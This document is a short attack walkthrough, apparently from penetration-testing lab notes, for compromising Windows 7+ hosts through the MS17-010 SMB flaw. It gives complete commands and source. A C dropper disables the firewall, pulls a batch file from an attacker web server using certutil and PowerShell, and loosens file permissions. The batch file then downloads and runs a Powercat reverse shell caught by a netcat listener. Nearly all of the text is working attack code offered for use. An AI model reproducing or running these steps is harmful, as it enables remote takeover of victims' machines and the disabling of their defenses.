This disables the firewall, evade AV, and can work even without PowerShell. Windows 7+.

1. Go to your /tmp folder and setup http listener: python3 -m http.server 80
2. Create the following file testexe.c in /tmp (Change IP)
3. Compile it to something.exe: i686-w64-mingw32-gcc testexe.c -o /tmp/something.exe
4. Generate a payload using Powercat (replace LHOST and LPORT with attacker IP): pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c IP -p 25 -e cmd.exe -ge" > /tmp/shell-25.txt
5. Create the file /tmp/backup.bat in /tmp as below. (Change IP)
6. Set up a listener on port 25 to catch Powercat: rlwrap nc -nlvp 25
7. Download the file mysmb.py and send_and_execute.py from here: https://github.com/helviojunior/MS17-010 and put them in the same folder.
8. Run the python2 script send_and_execute.py using pipenv shell: python send_and_execute.py targetIP /tmp/something.exe
9. Wait patiently!

testexe.c (REMEMBER IP PORT)

#include <stdlib.h>
int main ()
{
int i;
i = system ("netsh advfirewall set allprofiles state off");
i = system ("certutil.exe -urlcache -split -f \"http://192.168.119.213:80/backup.bat\" C:\\Windows\\Tasks\\backup.bat");
i = system ("powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.119.213:80/backup.bat','C:\\Windows\\Tasks\\backup.bat')");
i = system ("START /B C:\\Windows\\Tasks\\backup.bat");
i = system ("icacls C:\\Windows\\Tasks\\* /c /t /grant everyone:f");
return 0;
}

backup.bat (REMEMBER IP)

START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://IP:80/shell-25.txt');iex 'powershell -E $code'